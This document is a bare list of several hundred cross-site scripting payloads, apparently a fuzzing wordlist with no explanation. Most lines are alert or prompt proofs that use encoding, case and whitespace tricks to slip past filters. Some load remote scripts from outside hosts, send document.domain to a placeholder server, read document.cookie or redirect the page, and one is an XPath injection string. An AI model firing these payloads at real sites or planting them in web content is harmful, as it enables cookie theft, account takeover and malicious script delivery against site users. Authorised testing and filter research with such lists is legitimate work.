TEST
TEST
<script src='//㉛.st'>
<svg/onload=import('//㉛.st')>
"><img src=x onerror=alert(document.domain)>
"onpointerenter=alert(document.domain)+
%0d%0a%0d%0a<script>alert(5)></script>
%3F%3f%0D%0AX-XSS-Protection%3a0%0D%0AContent-Encoding:%20utf-8%0D%0A%0D%0A28%0D%0A<script>alert(document.domain)</script>%0D%0A0%0D%0A%0D%0A
"><svg on onload=(alert)(1)>
"><svg on onload=(alert)(document.domain)>
<svg onx=() onload=(confirm)(1)>
<img ignored=() src=x onerror=prompt(1)>
<object data=javascript:confirm()>
<Img Src="javascript:alert(1)> 1"OnError=location=src//
<Img Src="//X55.is/> "OnError=import(src)//
<svg/on/oNloaD=alert``>
"><svg+svg+svg\/\/On+OnLoAd=confirm(1)>
"\/><img%20s+src+c=x%20on+onerror+%20="alert(1)"\>
1"><meta http-equiv="refresh" content="0; url=//gurelahmet.com?
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
<a"/onclick=(confirm)()>Click Here!
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
<a href="j	a	v	asc
ri	pt:(a	l	e	r	t	(document.domain))">X</a>
<--%253cimg%20onerror=alert(1)%20src=a%253e --!>
<a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'>
javascript:{ alert`0` }
1'"><img/src/onerror=.1|alert''>
<img src=x onError=import('//1152848220/')>
%2sscript%2ualert()%2s/script%2u
“><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
<svg on =i onload=alert(domain)
<svg/onload=location/**/='https://your.server/'+document.domain>
<svg onx=() onload=window.alert?.()>
test",prompt%0A/*HelloWorld*/(document.domain)
"onx=() onmouseover=prompt(1)>
" onxXxxXXxXXXxx=() autofocus onmouseover=prompt(1)>
"onx={} onmouseover=prompt(1)>
"onx=[] onmouseover=prompt(1)>
" onx={} onfocus=prompt(1)><! --
<svg asd onload=confirm(1)>
1"><img src=x onmouseover=prompt(document.cookie)
1"><img src="http://xss.cx/xss.svg onmouseover=prompt(document.cookie)
<svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
<Svg/OnLoad=alert%25%0A26lpar;1)>
<img src="x" onerror="alert(1)//">
"-[8].find(confirm)-"
"-alert(document.domain)-"
'"><s>n0nce<img/src=x onerror=alert(document.domain)>
<iframe src="JavaScript: alert (/xss/)">
"//><<img src=x onerror=alert(7)></a>//
<object data=javascript:confirm()>
<img src=x onerror=alert(document.cookie)>
"><img src=x onerror=prompt(document.domain)>
"><img src=1 onerror=alert(1)>mmmc{{7*7}}{{'7'*7}}${'7'*7}
"><svg/onload=prompt(3)>
1"><img src=x onerror=prompt(document.domain)>":"test"}
"><img src=x onerror=alert(1)>
ahmet<details/open/ontoggle=alert(document.location)>
'"><svg/onload=prompt(5);>{{7*7}}
%0A<a'><x+'="><script>alert(1)</script>
">%0A<x+'="foo"><x+foo='><img+src=x+onerror=alert(1)>
test"><details/open/ontoggle=prompt(document.cookie)>
<IFRAME SRC="javascript:alert(document.cookie);"></IFRAME>
-[8].find(confirm)-
%27-%5Bdocument.domain%5D.find(confirm)-%27
“test”);print();a(“
<body onload=alert(/XSS/.source)>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video/poster/onerror=alert(1)>
<video><source onerror="javascript:alert(1)">
<video src=_ onloadstart="alert(1)">
<details/open/ontoggle="alert`1`">
<audio src onloadstart=alert(1)>
<marquee onstart=alert(1)>
<Svg%K9OnLoad=%7Krompt%6K1%6K>
22autofocus/onfocus%0A=%0A%22[2].find(confirm)
"<SCRIPT>alert(3);</SCRIPT>
"<SCRIPT>alert(document.cookie);</SCRIPT>
"ononmouseovermouseover=javascript:window.ononerrorerror=alert;throw[1] c="
"><img src=x onerror=alert(1)>"
<div onpointerover="alert(5)">MOVE HERE</div>
"><svg/onload=prompt(3)>
<svg/onload=prompt(3)>
<sCriPt>aLeRt(6)</sCriPt>
'"><svg/onload=prompt(5);>{{7*7}}
<x onpointerRawupdatE=+alert(document.domain)>
<script>x"onfocus="alert(1)"autofocus="x
"><img src=x onerror=alert(1)> ->
ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6 ->
#<img src=x onerror=alert(5)>
</script><script>alert('l33t')
<audio src=1 onerror=alert('l33t')>
<svg/onload=alert(7)>
"><iMg SrC=oNeRROr='alert('l33t');'>
<input onfocus=alert(document.domain) </autofocus>
<audio src=1 onerror=confirm(7)>
"><iMg SrC=oNeRROr='prompt(3);'>
%22%3E%3CiMg%20SrC%3DoNeRROr%3D%27prompt(3)%3B%27%3E
"onmouseover="confirm(document.domain)"
<script>alert(1)</script>
<script>prompt(1)</script>
<script>confirm(1)</script>
<svg onload=prompt(1)>
"><svg/onload=prompt(7)>
<img src=xss onerror=alert(1)>
<svg/on<script>load=prompt(document.cookie);>
"><img src=xss onerror=prompt(1)>
<img src="javascript:alert(1);">
<sc<script>ript>alert(1)</sc</script>ript>
<style type='text/less'>x{x:`alert(1)`}</style>
xxx', x : window.location.assign("https://www.google.com/+document.domain"),//
-alert(1)-
"-prompt(1)-"
"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
"><svg onload=prompt(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))>
http://www.<script>alert(1)</script .com
%00%00%00%00%00%00%00<script%20src=http://xss.rocks/xss.js></script>
'}) %26%2359a=confirm%26%2359a(document.domain)%26%2359b({asd:'
%0A</script><script>alert(/xss/)//
{{a=toString().constructor.prototype;a.charAt=a.trim;$eval('a,alert(2),a')}}
hacker' or 1=1 ]/parent::node()/name%00
<script>alert(123);</script>
<ScRipT>alert("XSS");</ScRipT>
<script>alert(123)</script>
<script>alert("hellox worldss");</script>
<script>alert(“XSS”)</script>
<script>alert(“XSS”);</script>
<script>alert(‘XSS’)</script>
“><script>alert(“XSS”)</script>
<script>alert(/XSS”)</script>
<script>alert(/XSS/)</script>
</script><script>alert(1)</script>
‘; alert(1);
‘)alert(1);//
<ScRiPt>alert(1)</sCriPt>
<IMG SRC=jAVasCrIPt:alert(‘XSS’)>
<IMG SRC=”javascript:alert(‘XSS’);”>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert(‘XSS’)>
<img src=xss onerror=alert(1)>
<iframe %00 src="	javascript:prompt(1)	"%00>
<svg><style>{font-family:'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT:confirm(1)"
<sVg><scRipt %00>alert(1) {Opera}
<img/src=`%00` onerror=this.onerror=confirm(1)
<form><isindex formaction="javascript:confirm(1)"
<img src=`%00`
 onerror=alert(1)

<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
"><h1/onmouseover='\u0061lert(1)'>%00
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript:alert(document.location)>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>
<img/	  src=`~` onerror=prompt(1)>
<form><iframe 	  src="javascript:alert(1)" 	;>
<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a
http://www.google<script .com>alert(document.location)</script
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a
<img/src=@  onerror = prompt('1')
<style/onload=prompt('XSS')
<script ^__^>alert(String.fromCharCode(49))</script ^__^
</style  ><script   :-(>/**/alert(document.location)/**/</script   :-(
�</form><input type="date" onfocus="alert(1)">
<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
<iframe srcdoc='<body onload=prompt(1)>'>
<a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a>
<script ~~~>alert(0%0)</script ~~~>
<style/onload=<!--	> alert (1)>
<///style///><span %2F onmousemove='alert(1)'>SPAN
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
<marquee onstart='javascript:alert(1)'>^__^
<div/style="width:expression(confirm(1))">X</div> {IE7}
<iframe/%00/ src=javaSCRIPT:alert(1)
//<form/action=javascript:alert(document.cookie)><input/type='submit'>//
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
<a/href="javascript: javascript:prompt(1)"><input type="X">
</plaintext\></|\><plaintext/onmouseover=prompt(1)
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}
<a href="javascript:\u0061le%72t(1)"><button>
<div onmouseover='alert(1)'>DIV</div>
<iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
<a href="jAvAsCrIpT:alert(1)">X</a>
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<var onmouseover="prompt(1)">On Mouse Over</var>
<a href=javascript:alert(document.cookie)>Click Here</a>
<img src="/" =_=" title="onerror='prompt(1)'">
<%<!--'%><script>alert(1);</script -->
<script src="data:text/javascript,alert(1)"></script>
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<input value=<><iframe/src=javascript:confirm(1)
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
http://www.<script>alert(1)</script .com
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe>
<svg><script ?>alert(1)
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
<img src=`xx:xx`onerror=alert(1)>
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox+1
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
<object data=javascript:\u0061le%72t(1)>
<script>+-+-1-+-+alert(1)</script>
<body/onload=<!-->
alert(1)>
<script itworksinallbrowsers>/*<script* */alert(1)</script
<img src ?itworksonchrome?\/onerror = alert(1)
<svg><script>//
confirm(1);</script </svg>
<svg><script onlypossibleinopera:-)> alert(1)
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
<script x> alert(1) </script 1=2
<div/onmouseover='alert(1)'> style="x:">
<--`<img/src=` onerror=alert(1)> --!>
<script/src=data:text/javascript,alert(1)></script>
<div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
"><img src=x onerror=window.open('https://www.google.com/');>
<form><button formaction=javascript:alert(1)>CLICKME
<math><a xlink:href="//jsfiddle.net/t846h/">click
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=”jav ascript:alert(‘XSS’);”>
<IMG SRC=”jav	ascript:alert(‘XSS’);”>
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
%253cscript%253ealert(1)%253c/script%253e
“><s”%2b”cript>alert(document.cookie)</script>